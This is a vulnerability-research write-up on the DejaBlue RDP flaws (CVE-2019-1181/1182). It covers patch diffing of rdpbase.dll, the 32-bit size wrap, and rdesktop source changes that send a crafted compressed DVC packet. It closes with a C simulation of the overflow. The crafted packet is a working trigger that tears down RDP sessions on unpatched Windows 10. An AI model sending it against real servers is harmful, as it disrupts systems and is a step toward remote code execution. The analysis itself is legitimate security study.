DejaBlue
===

<center>

![](https://i.imgur.com/it2vUXe.png =800x)

</center>

CVE-2019-1181 & CVE-2019-1182

Lab VM: Windows 10 Version 1809 for x64-based Systems

The patch was obtained from Microsoft's update guidance for this vulnerability; for this build the relevant package is the KB4511553 update. :link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181

- This is a pre-authentication remote code execution vulnerability (see Microsoft's advisory below)
- The bug sits in the data path of the Remote Desktop Protocol (RDP) <font color=red>dynamic virtual channels (DVC)</font>
- The vulnerable code lives in the dynamic-link library <font color=red>rdpbase.dll</font>
- The bug itself is a logic error in a size calculation (an integer overflow)

###### tags: `Vul Research`

## Overview

[Microsoft advisory](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182) :point_left:

<font size=4 color=brown>**CVE-2019-1181 & CVE-2019-1182 | Remote Desktop Services Remote Code Execution Vulnerability**</font>

<font color=brown>Security Vulnerability</font>

<font size=2>Published: 08/13/2019 MITRE CVE-2019-1181 / CVE-2019-1182</font>

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could <font color=blue>execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights</font>.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system's Remote Desktop Service via RDP.

The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.
## Static analysis (observation)

- BinDiff
  - BinDiff was used to compare the binary before and after the patch, to locate the function that contains the bug
  ![](https://i.imgur.com/roV3WdW.png)
  - One basic block in the function's control flow differs noticeably
  ![](https://i.imgur.com/5HAYcOt.png =400x)
- IDA
  - A closer look at that block
    - Before the patch
    ![](https://i.imgur.com/sficIgx.png =400x)
    - After the patch
    ![](https://i.imgur.com/k2X8tWB.png =400x)
  - After the patch the check on the size `eax+0x2000` is stricter: the code tests whether `eax+0x2000` is greater than `edx`
  - For an unsigned 32-bit `size` in the range `0xffffe000 <= size <= 0xffffffff`, the sum `size+0x2000` wraps around to `0 <= size+0x2000 <= 0x1fff`
  - In the patched file the new logic is: if `size > size+0x2000` (that is, the addition wrapped), the value handed to `new` becomes -1 and the rest of the function returns immediately
  - The actual damage is done by the `memcpy` further down the function
  ![](https://i.imgur.com/9eHMSxW.png =400x)

As the figure shows, the function later calls `memcpy`, and its first argument `dest` points to the memory allocated by the earlier `new`. If `DecompressedSize` is a value in `0xffffe000 < DecompressedSize < 0xffffffff`, then `DecompressedSize + 0x2000` wraps around and is smaller than the original size. If the source buffer `buf` is still its original size, `memcpy` writes `buf-(DecompressedSize + 0x2000)` bytes past the end of `dest`. If the memory after `dest` is used to hold pointers, the overwrite changes those pointers and can be used to hijack control flow.

## Dynamic analysis (verification)

### Approach 1

Reference: https://bbs.pediy.com/thread-255728.htm

Simulating one attack and tracing memory dynamically should give a first idea of how controllable the bug is:

- Build a DVC packet whose payload overwrites other heap pointers, causing a memory fault
- Check whether the fault is a bad read or a bad execute; this determines how far exploitation can go

<u>Idea: attack a Win10 box once, capture the packets to see where the connection fails, then go back to the PoC and locate what needs to change</u>

<font size=4>**Download and run the CVE-2019-0708 PoC**</font>

This PoC targets Windows 7, but, following the [reference article](https://bbs.pediy.com/thread-255728.htm), the RDP connection initialisation should be the same.

The required packages have to be installed first:

```
ImportError: No module named OpenSSL
> sudo pip install pyOpenSSL
.......
.......
ImportError: No module named impacket.structure
> sudo apt-get install -y python-impacket
.......
.......
```

Running it fails with error number 104 (errno 104 is `ECONNRESET`, connection reset by peer)

![](https://i.imgur.com/HfZZdpq.png =500x)

Possible causes:

- some rule of the RDP protocol?
- the GroomBase is wrong

### Approach 2

Reference: https://bbs.pediy.com/thread-256766.htm

On Ubuntu 18.04, download the [rdesktop tarball](https://github.com/rdesktop/rdesktop/releases/download/v1.9.0/rdesktop-1.9.0.tar.gz) :point_left: it needs a pile of packages; see the <u>Appendix</u>

Modify dvc.c as follows (three places):

- In `dvc_init`, register the channel that the server will request in its DVC Create Request PDU (line 7)

```clike=
dvc_init()
{
    memset(channels, 0, sizeof(channels));
    dvc_channel = channel_register("drdynvc",
                                   CHANNEL_OPTION_INITIALIZED | CHANNEL_OPTION_ENCRYPT_RDP,
                                   dvc_process_pdu);
    dvc_channels_register("Microsoft::Windows::RDS::Telemetry", dvc_process_pdu); /* added: accept this DVC name */
    return (dvc_channel != NULL);
}
```

- After `dvc_send_create_response`, add a call to `dvc_send_first_compressed`, which sends the DVC Data First Compressed PDU (line 20)

```clike=
static void
dvc_process_create_pdu(STREAM s, dvc_hdr_t hdr)
{
    char name[512];
    uint32 channelid;

    channelid = dvc_in_channelid(s, hdr);
    in_ansi_string(s, name, sizeof(name));

    logger(Protocol, Debug,
           "dvc_process_create(), server requests channelid = %d, name = '%s'",
           channelid, name);

    if (dvc_channels_exists(name))
    {
        logger(Core, Verbose, "Established dynamic virtual channel '%s'", name);

        dvc_channels_set_id(name, channelid);
        dvc_send_create_response(True, hdr, channelid);
        dvc_send_first_compressed(hdr, channelid); /* added: fire the crafted PDU right after the channel is up */
    }
    else
    {
        dvc_send_create_response(False, hdr, channelid);
    }
}
```

- Construct the `dvc_send_first_compressed` function (new)

```clike=
static void
dvc_send_first_compressed(dvc_hdr_t hdr, uint32 channelid)
{
    STREAM s;

    logger(Protocol, Debug, "dvc_send_first_compressed() channelid %d", channelid);

    hdr.hdr.cmd = DYNVC_DATA_FIRST_COMPRESSED;
    s = dvc_init_packet(hdr, channelid, 22); /* 22 = 4 + 1 + 2 + 4 + 4 + 1 + 6 bytes below */

    out_uint8(s, 0x00);  /* Length (4 bytes) */
    out_uint8(s, 0x00);
    out_uint8(s, 0x00);
    out_uint8(s, 0x00);

    /* RDP_SEGMENTED_DATA */
    out_uint8(s, 0xe1);         /* descriptor: multipart */
    out_uint16(s, 0x01);        /* segmentCount */
    out_uint32(s, 0xffffe001);  /* uncompressedSize: wraps when the server adds 0x2000 */

    /* RDP_DATA_SEGMENT */
    out_uint32(s, 0x07);        /* size: 1 header byte + 6 data bytes */

    /* RDP_BULK_ENCODED_DATA */
    out_uint8(s, 0x26);  /* header */
    out_uint8(s, 0x38);  /* data */
    out_uint8(s, 0xc4);  /* data */
    out_uint8(s, 0x3f);  /* data */
    out_uint8(s, 0xf4);  /* data */
    out_uint8(s, 0x74);  /* data */
    out_uint8(s, 0x01);  /* data */

    s_mark_end(s);
    channel_send(s, dvc_channel);
    s_free(s);
}
```

Just before `add eax,2000h` executes, rax holds `0xffffe001` <font color=red>(`0xffffe001` is the uncompressedSize value from the packet)</font>

![](https://i.imgur.com/f4YP4Qs.png)

After the add, the value has wrapped around

![](https://i.imgur.com/hvliFmU.png)

With a breakpoint near the `memcpy`, the decompressed data can be inspected: this packet decompresses to 1595 bytes of `q` (0x71)

![](https://i.imgur.com/UBvnW8x.png)

Next step: confirm whether the data overwritten with `0x71` is ever used

## Conclusion

<font color=red size=5>So far this only tears down the existing RDP session on side C,</font>

<font color=red size=5>or prevents side A from establishing one; it does not seem to get as far as a BSOD...</font>

![](https://i.imgur.com/6lwV7NI.png)

<font color=red size=4>The analyses found online all stop at terminating the service; none reaches a BSOD, let alone RCE</font>

What are the next steps?

- Determine which heap our vulnerable chunk is in (Segment/NT)
- Determine which component uses the chunk to make the allocation (LFH/VS/etc.)
- Find a way to make a heap spray
- Find a way to leak memory

## Appendix

#### Step-by-step rdesktop install

Download

```
$ wget https://github.com/rdesktop/rdesktop/releases/download/v1.9.0/rdesktop-1.9.0.tar.gz
```

Extract and enter the directory (`gzip -d` alone only strips the `.gz`; the archive has to be untarred as well)

```
$ tar -xzf rdesktop-1.9.0.tar.gz
$ cd rdesktop-1.9.0
```

Install packages (if one is missing, `./configure` will say which; look up the package name and install it)

```
$ sudo apt-get install build-essential libx11-dev libssl-dev libgssglue-dev libpcsclite-dev
$ sudo apt-get install -y pkg-config
$ sudo apt install libxcursor1
$ sudo apt install libtasn1-6-dev
$ sudo apt install libgnutls28-dev
$ sudo apt-get install libgssglue-dev
$ sudo apt-get install libgssglue1
$ sudo apt-get install libgssapi-krb5-2
$ sudo apt-get install libgssapi3-heimdal
$ sudo apt install libxcursor1
$ sudo apt install libxcursor-dev
```

Build and install

```
$ ./configure --disable-credssp
$ make
$ sudo make install
```

Connect

```
$ RDESKTOP_DEBUG=Protocol ./rdesktop [IP ADDRESS]
```

## Research log

```mermaid
gantt
    title Research Progress
    section Information gathering
    Data collation          :a1, 2020-03-19, 2d
    section Static analysis
    Material collection     :a2, 2020-03-21, 3d
    Source static analysis  :a3, 2020-03-21, 14d
    section Dynamic analysis
    Material collection     :2020-03-31, 6d
    Environment setup       :2020-03-31, 10d
    Dynamic analysis        :a4, 2020-04-06, 24d
    section Write-up
    Data collation          :after a4, 2d
```

**Blockers**
> 2020-04-04 RDESKTOP would not build
> Solution: set up a fresh Ubuntu VM and install the required packages; details in the appendix

> 2020-04-06 Dynamic analysis could not trigger the bug
> Solution: the attack packet format was wrong; modified the source again

## References

- [1] [Windows远程桌面服务的远程代码执行漏洞(CVE-2019-1182)分析](https://bbs.pediy.com/thread-255728.htm)
- [2] [Dejablue Vulnerabilities in Windows 7 to Windows 10](https://securityboulevard.com/2020/02/dejablue-vulnerabilities-in-windows-7-to-windows-10-cve-2019-1181-and-cve-2019-1182/)
- [3] [DejaBlue: Analyzing a RDP Heap Overflow](https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html)
- [4] [DejaBlue(CVE-2019-1181/1182) Windows RDP漏洞分析](https://bbs.pediy.com/thread-256766.htm)
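## Worked example: the size wrap and the DVC payload

The modified rdesktop above sends a DYNVC_DATA_FIRST_COMPRESSED PDU whose RDP_SEGMENTED_DATA body carries `uncompressedSize = 0xffffe001`, and the static analysis shows the server computing `uncompressedSize + 0x2000` in 32 bits, allocating that much, and then copying the decompressed data into the buffer. The C program below is an added worked example for both of those passages; it is not code from this page, from rdesktop or from RDPBASE.DLL. It serialises the same 22-byte body with the little-endian layout that `out_uint8/16/32` produce, reads `uncompressedSize` back out the way a server-side parser would, runs the pre-patch arithmetic and the patched wrap check side by side, and finally performs the `memcpy` with the pre-patch size inside a toy arena where a sentinel 64-bit "pointer" sits in the next chunk. The arena, its 16-byte chunk rounding, the sentinel value and every function name here are assumptions for illustration; the real NT heap layout is exactly what the next-steps list above still has to determine.

```c
/*
 * Added example, not code from the page, rdesktop or RDPBASE.DLL.
 * Models the RDP_SEGMENTED_DATA body sent by the page's dvc_send_first_compressed()
 * and the server-side size arithmetic described in the static analysis.
 * The toy arena, 16-byte chunk rounding and sentinel pointer are assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DYNVC_SLACK      0x2000u  /* the `add eax, 2000h` seen in IDA */
#define ARENA_SIZE       0x8000u  /* toy heap, nothing like the real NT heap */
#define OFF_UNCOMPRESSED 7        /* 4 (Length) + 1 (descriptor) + 2 (segmentCount) */

/* Little-endian writers/readers mirroring rdesktop's out_uint8/16/32. */
static void put_u8(uint8_t *p, uint8_t v)   { p[0] = v; }
static void put_u16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put_u32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint32_t get_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Serialises the 22-byte body built in the page's dvc_send_first_compressed(). */
size_t build_segmented_payload(uint8_t *out, uint32_t uncompressed_size)
{
    static const uint8_t bulk[] = { 0x38, 0xc4, 0x3f, 0xf4, 0x74, 0x01 }; /* the page's encoded bytes */
    size_t n = 0;
    put_u32(out + n, 0);                         n += 4; /* Length, left 0 as on the page */
    put_u8 (out + n, 0xe1);                      n += 1; /* RDP_SEGMENTED_DATA descriptor: multipart */
    put_u16(out + n, 1);                         n += 2; /* segmentCount */
    put_u32(out + n, uncompressed_size);         n += 4; /* uncompressedSize, attacker-chosen */
    put_u32(out + n, 1 + (uint32_t)sizeof bulk); n += 4; /* RDP_DATA_SEGMENT.size = header + data */
    put_u8 (out + n, 0x26);                      n += 1; /* RDP_BULK_ENCODED_DATA header */
    memcpy(out + n, bulk, sizeof bulk);          n += sizeof bulk;
    return n;
}

/* What a server-side parser extracts from that body. */
uint32_t payload_uncompressed_size(uint32_t uncompressed_size)
{
    uint8_t body[32];
    size_t len = build_segmented_payload(body, uncompressed_size);
    return len >= OFF_UNCOMPRESSED + 4 ? get_u32(body + OFF_UNCOMPRESSED) : 0;
}

/* Pre-patch arithmetic: the sum is taken in 32 bits and silently wraps. */
uint32_t alloc_size_prepatch(uint32_t uncompressed_size)
{
    return uncompressed_size + DYNVC_SLACK;
}

/* Post-patch check as read from the BinDiff: if eax+0x2000 ended up below eax the
 * addition wrapped. Returns 0 (reject) instead of an allocation size in that case. */
uint32_t alloc_size_patched(uint32_t uncompressed_size)
{
    uint32_t sum = uncompressed_size + DYNVC_SLACK;
    return sum < uncompressed_size ? 0 : sum;
}

/* Bytes the copy runs past the buffer the pre-patch code allocated. */
size_t overflow_bytes(uint32_t uncompressed_size, size_t decompressed_len)
{
    uint32_t alloc = alloc_size_prepatch(uncompressed_size);
    return decompressed_len > alloc ? decompressed_len - alloc : 0;
}

/* Runs the memcpy with pre-patch sizing inside a toy arena: the decompression buffer is
 * the first chunk and a sentinel 64-bit "pointer" lives in the next one. Returns the
 * sentinel's value after the copy; 0x4141414141414141 means it was untouched. */
uint64_t simulate_prepatch_copy(uint32_t uncompressed_size, size_t decompressed_len, uint8_t fill)
{
    static uint8_t arena[ARENA_SIZE];
    static uint8_t decompressed[ARENA_SIZE];
    uint64_t sentinel = 0x4141414141414141ULL;
    uint32_t alloc = alloc_size_prepatch(uncompressed_size);
    size_t chunk = ((size_t)alloc + 15) & ~(size_t)15;        /* assumed 16-byte chunk rounding */

    if (chunk + sizeof sentinel > ARENA_SIZE) return 0;       /* buffer would not fit the toy arena */
    if (decompressed_len > ARENA_SIZE) decompressed_len = ARENA_SIZE; /* keep the arena itself safe */

    memset(arena, 0, sizeof arena);
    memcpy(arena + chunk, &sentinel, sizeof sentinel);        /* "pointer" stored in the next chunk */
    memset(decompressed, fill, decompressed_len);             /* decompressor output (page: 1595 x 'q') */

    memcpy(arena, decompressed, decompressed_len);            /* dest = undersized buffer at arena[0] */

    memcpy(&sentinel, arena + chunk, sizeof sentinel);
    return sentinel;
}

int main(void)
{
    uint32_t sz = 0xffffe001u;
    printf("uncompressedSize parsed from payload: 0x%08x\n", payload_uncompressed_size(sz));
    printf("pre-patch alloc: 0x%x bytes, patched check: %s\n", alloc_size_prepatch(sz),
           alloc_size_patched(sz) ? "accepted" : "rejected");
    printf("sentinel after copy: 0x%016llx (%zu bytes past end)\n",
           (unsigned long long)simulate_prepatch_copy(sz, 1595, 0x71), overflow_bytes(sz, 1595));
    return 0;
}
```

Build with `cc -std=c99 -Wall example.c` and run. With the page's values (`0xffffe001` and 1595 bytes of `0x71`) the pre-patch path allocates a single byte, the copy runs 1594 bytes past it and the sentinel comes back as `0x7171717171717171`, while the patched check rejects the same size outright; with a sane `uncompressedSize` such as `0x1000` the buffer is larger than the copy and the sentinel is untouched.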